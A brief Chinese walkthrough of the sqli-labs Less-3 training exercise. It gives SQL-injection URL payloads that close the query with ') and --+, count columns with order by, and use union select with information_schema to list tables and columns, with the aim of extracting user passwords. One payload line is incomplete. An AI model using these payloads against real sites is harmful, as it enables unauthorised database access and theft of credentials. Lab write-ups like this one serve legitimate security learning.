首先需要猜测 其中的闭合
输入‘“)使数据库回显报错信息
/Less-3/?id=1'")
#报错回显如下
'")') LIMIT 0,1'
")') LIMIT 0,1 首先去掉最外边的 单引号
#可以看到 ”) 是我们填入的 而之后又会有 ’) 可以猜测是‘)闭合
/Less-3/?id=1')--+ 使用--+来注释后面的语句
猜测字段数量
#使用排序的方法对字段数猜测
Less-3/?id=1') order by 3--+
对回显的信息查询
# 使用联合查询语句 对 查询的数据进行回显
/Less-3/?id=-1') union select 1,user(),database() --+
继续查询表名 information_schema 是一个信息数据库里面保存着 sql服务所维护其他数据库的信息包括表名和权限等信息
information_schema详情跳转
group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA=database() --+
所会显得密码处就是我们当前数据库的表名
随后继续爆破 表名
/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
然后对表内的账号密码进行查找